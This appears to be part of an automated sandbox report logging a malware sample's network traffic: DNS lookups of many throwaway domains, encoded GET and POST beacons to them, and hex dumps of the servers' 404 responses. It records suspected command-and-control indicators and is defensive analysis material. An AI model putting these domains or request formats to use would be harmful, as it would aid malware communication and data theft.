                Source: global trafficHTTP traffic detected: GET /k6vm/?xHrti=IpSlbxE0jR&bJMLqbS=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zoomlive.liveConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /725g/?bJMLqbS=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&xHrti=IpSlbxE0jR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dietcoffee.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /v2ut/?xHrti=IpSlbxE0jR&bJMLqbS=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.guacamask.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /qt4m/?bJMLqbS=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&xHrti=IpSlbxE0jR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficDNS traffic detected: DNS query: www.7261ltajbc.bond
                Source: global trafficDNS traffic detected: DNS query: www.muasamgiare.click
                Source: global trafficDNS traffic detected: DNS query: www.kkpmoneysocial.top
                Source: global trafficDNS traffic detected: DNS query: www.artkub.net
                Source: global trafficDNS traffic detected: DNS query: www.happyjam.life
                Source: global trafficDNS traffic detected: DNS query: www.123hellodrive.shop
                Source: global trafficDNS traffic detected: DNS query: www.zoomlive.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.guacamask.online
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: unknownHTTP traffic detected: POST /bsye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.muasamgiare.clickCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 212Connection: closeOrigin: http://www.muasamgiare.clickReferer: http://www.muasamgiare.click/bsye/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20Data Raw: 62 4a 4d 4c 71 62 53 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 4b 57 55 2f 4e 7a 4e 49 41 6a 69 41 6f 6d 6a 5a 31 73 64 4b 41 45 79 49 51 58 79 35 4f 43 75 76 75 59 30 6f 62 46 46 45 61 46 6d 6e 69 7a 61 33 70 48 39 58 72 6f 4d 48 39 57 65 7a 59 73 58 48 74 5a 63 46 56 78 2b 38 63 7a 38 68 4f 31 71 46 6d 7a 41 58 6c 61 38 74 59 64 59 68 4e 73 66 6c 70 64 35 73 36 6b 42 56 71 35 68 4e 78 68 52 53 45 51 63 34 30 6c 4b 36 4a 6f 73 38 50 77 6a 65 66 50 42 6a 4e 46 78 4e 33 34 43 4d 37 48 32 78 71 6d 43 4b 34 56 44 76 4b 4d 57 62 46 45 41 2f 4b 50 6e 34 32 4b 2f 56 4a 5a 33 59 4b 62 56 53 42 45 72 4e 4f 54 4d 4b 6b 51 44 4f 42 4b 4e 31 Data Ascii: bJMLqbS=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4VDvKMWbFEA/KPn42K/VJZ3YKbVSBErNOTMKkQDOBKN1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:31:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:31:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:31:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:31:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:32:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:32:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:32:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Fri, 10 Jan 2025 20:37:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 10 Jan 2025 20:32:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 10 Jan 2025 20:32:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 10 Jan 2025 20:32:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 10 Jan 2025 20:32:49 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 32 35 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 